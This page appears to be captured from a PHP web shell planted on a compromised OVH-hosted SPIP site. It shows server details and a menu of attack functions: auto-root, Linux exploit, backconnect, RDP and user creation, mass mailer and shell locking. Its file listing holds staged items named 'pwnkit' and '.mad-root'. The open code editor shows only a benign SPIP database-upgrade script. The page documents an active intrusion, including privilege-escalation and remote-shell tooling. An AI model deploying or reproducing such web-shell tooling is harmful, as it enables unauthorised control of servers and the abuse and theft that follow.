Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
grice /
ecrire /
maj /
legacy /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
svn10000.php
881
B
-rw----r--
v21.php
3.26
KB
-rw----r--
v30.php
10.68
KB
-rw----r--
v31.php
1.72
KB
-rw----r--
v32.php
891
B
-rw----r--
v40.php
2.48
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : v31.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ /** * Gestion des mises à jour de bdd de SPIP * * Mises à jour en 3.1 * * @package SPIP\Core\SQL\Upgrade **/ if (!defined('_ECRIRE_INC_VERSION')) { return; } $GLOBALS['maj'][21676] = [ ['ranger_cache_gd2'], ]; /** * Ranger les images de local/cache-gd2 dans des sous-rep * * https://core.spip.net/issues/3277 */ function ranger_cache_gd2() { spip_log('ranger_cache_gd2'); $base = _DIR_VAR . 'cache-gd2/'; if (is_dir($base) and is_readable($base)) { if ($dir = opendir($base)) { while (($f = readdir($dir)) !== false) { if ( !is_dir($base . $f) and strncmp($f, '.', 1) !== 0 and preg_match(',[0-9a-f]{32}\.\w+,', $f) ) { $sub = substr($f, 0, 2); $sub = sous_repertoire($base, $sub); @rename($base . $f, $sub . substr($f, 2)); @unlink($base . $f); // au cas ou le rename a foire (collision) } if (time() >= _TIME_OUT) { return; } } } } } $GLOBALS['maj'][21742] = [ ['sql_alter', "TABLE spip_articles CHANGE url_site url_site text DEFAULT '' NOT NULL"], ['sql_alter', "TABLE spip_articles CHANGE virtuel virtuel text DEFAULT '' NOT NULL"], ];
Close